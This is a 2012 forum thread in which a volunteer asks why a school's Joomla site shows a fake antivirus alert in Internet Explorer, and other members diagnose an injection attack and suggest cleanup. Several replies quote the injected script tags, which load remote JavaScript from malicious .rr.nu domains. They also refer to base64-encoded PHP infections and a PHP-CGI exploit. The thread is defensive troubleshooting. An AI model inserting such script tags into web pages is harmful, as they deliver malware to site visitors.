+ Post New Thread
Results 1 to 8 of 8
Internet Related/Filtering/Firewall Thread, Can you have a website virus? in Technical; Hi, I help to run a Joomla website, hosted by DreamHosts. Something strange has happened. When the website is loaded ...
  1. #1
    rocknrollstar's Avatar
    Join Date
    Jun 2008
    Location
    Hampshire
    Posts
    435
    Thank Post
    387
    Thanked 28 Times in 24 Posts
    Rep Power
    20

    Can you have a website virus?

    Hi, I help to run a Joomla website, hosted by DreamHosts. Something strange has happened. When the website is loaded in FF and Chrome, everything's fine. However, when loaded in IE (I'm using v9), it's gives a message "windows antivirus has 2012 has found critical process activity...." which I understand is a malware issue.

    I can't figure out how it got there, or more importantly, how to get rid of it! The website is Silchester School (ingore the 3MB pic on the front!)

    Thanks in advance for your help.

  2. #2

    SYNACK's Avatar
    Join Date
    Oct 2007
    Posts
    11,223
    Thank Post
    874
    Thanked 2,717 Times in 2,302 Posts
    Blog Entries
    11
    Rep Power
    780
    Do you have any ad banner code on it and is it the latest version/patch of Joomla. The common opensource varients are massivly
    sought after by scripted attacks which is how they end up affecting stacks of sites all at the same time. This may be what happened to yours, I'd be tempted to restore from a backup and then make sure that all patches/upgrades have been applied, take another backup and hope that the flaw has actually been fixed by the maintainers of the code. This includes making sure your modules are up to date if you have used extra ones.
    Last edited by SYNACK; 13th May 2012 at 03:46 PM.

  3. Thanks to SYNACK from:

    rocknrollstar (13th May 2012)

  4. #3

    Steve21's Avatar
    Join Date
    Feb 2011
    Location
    Swindon
    Posts
    2,697
    Thank Post
    335
    Thanked 515 Times in 483 Posts
    Rep Power
    179
    Quote Originally Posted by rocknrollstar View Post
    Hi, I help to run a Joomla website, hosted by DreamHosts. Something strange has happened. When the website is loaded in FF and Chrome, everything's fine. However, when loaded in IE (I'm using v9), it's gives a message "windows antivirus has 2012 has found critical process activity...." which I understand is a malware issue.

    I can't figure out how it got there, or more importantly, how to get rid of it! The website is Silchester School (ingore the 3MB pic on the front!)

    Thanks in advance for your help.
    Silchester School

    2012/05/13 15:42:26 +0100 IP-BLOCK 91.230.147.204 (Type: outgoing, Port: 53767, Process: iexplore.exe)

    Russian Federation Attacks!

    <script src="http://deploy92mentcat.rr.nu/mm.php?d=x1"></script>

    You have injectioned code in it, so it loads everytime.

    Guessing you're blocking javascript on FF so it's not showing it

    - Edit - Most likely either old version of cms, old unsecure addons (notice lots of plugins loading), or not filtering input in terms of code

    Steve
    Last edited by Steve21; 13th May 2012 at 03:48 PM.

  5. Thanks to Steve21 from:

    rocknrollstar (13th May 2012)

  6. #4

    Steve21's Avatar
    Join Date
    Feb 2011
    Location
    Swindon
    Posts
    2,697
    Thank Post
    335
    Thanked 515 Times in 483 Posts
    Rep Power
    179
    Seems it's spreading too -

    Check your URLs as they've been modded

    <script src="http://deploy92mentcat.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Letters
    Suspicious domain detected.
    <script src="http://resp86ectsc.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Silchester School
    Suspicious domain detected.
    <script src="http://subs31tanc.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Contacts
    Suspicious domain detected.
    <script src="http://murder63program.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Internet Safety
    Suspicious domain detected.
    <script src="http://ormi35dable.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Catering
    Suspicious domain detected.
    <script src="http://olla91rsnew.rr.nu/mm.php?d=x1"></script>

  7. Thanks to Steve21 from:

    rocknrollstar (13th May 2012)

  8. #5
    Cache's Avatar
    Join Date
    Apr 2008
    Location
    Cumbria
    Posts
    1,220
    Thank Post
    454
    Thanked 177 Times in 174 Posts
    Blog Entries
    3
    Rep Power
    65
    I host on dreamhost also for my personal sites and had a breach somehow in February where all my php files were infected - I'd check the modified date and the top of a few php files for what will likely be a base64 encoded string as well as for a file called r.php.

    What I ended up doing for my wordpress install was deleteing and reuploading all the files, but for all other files followed the instructions on this page for the cleaner script http://www.php-beginners.com/solve-w...ttack-fix.html
    Last edited by Cache; 13th May 2012 at 04:18 PM.

  9. Thanks to Cache from:

    rocknrollstar (13th May 2012)

  10. #6


    Join Date
    Feb 2007
    Location
    51.403651, -0.515458
    Posts
    9,011
    Thank Post
    230
    Thanked 2,695 Times in 1,990 Posts
    Rep Power
    791
    This must be related to the recent PHP-CGI exploit...

    151,000 domains attacked via dangerous PHP hole
    More than 151,000 domains held by US hosting provider Dreamhost have been targeted by attackers exploiting a dangerous and long-standing PHP vulnerability.

    As reported by SC Magazine, the PHP-CGI vulnerability had existed since 2004 and allowed remote code execution on current versions of the language.

    The hole has now been patched, but only after preceeding fixes (versions 5.3.12 and 5.4.2) failed to work.

    Some 230,000 attacks against the hosts directly attempted to exploit the vulnerability, according to SpiderLabs which obtained the figures from Dreamhost. (Source)

  11. Thanks to Arthur from:

    rocknrollstar (13th May 2012)

  12. #7
    hit
    hit is offline
    hit's Avatar
    Join Date
    Mar 2008
    Location
    London
    Posts
    324
    Thank Post
    47
    Thanked 50 Times in 48 Posts
    Rep Power
    51
    Check the contents of the db table jos_menu, URL's to joomla pages should be something like index.php?option=com_content&view=article&id=14 (in the link field). Even if you reload the web pages the problem won't be fixed unless you have a backup of the database. You can fix it without but it's time consuming.

  13. Thanks to hit from:

    rocknrollstar (13th May 2012)

  14. #8
    rocknrollstar's Avatar
    Join Date
    Jun 2008
    Location
    Hampshire
    Posts
    435
    Thank Post
    387
    Thanked 28 Times in 24 Posts
    Rep Power
    20
    Great, thanks everyone for your help. I've used a backup from April- a little behind, but better than nothing.

SHARE:
+ Post New Thread

Similar Threads

  1. How many biscuits can you have......
    By Dos_Box in forum General Chat
    Replies: 57
    Last Post: 24th November 2011, 10:36 AM
  2. Can you have a local mandatory profile?
    By dtakias in forum Windows
    Replies: 16
    Last Post: 3rd March 2009, 11:35 AM
  3. Can you have an OU in an OU?
    By TechSupp in forum Windows
    Replies: 7
    Last Post: 16th April 2008, 11:33 AM
  4. Replies: 14
    Last Post: 31st January 2008, 01:13 PM
  5. Can you have two ePortals?
    By bigdpm in forum MIS Systems
    Replies: 5
    Last Post: 25th June 2007, 06:29 AM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •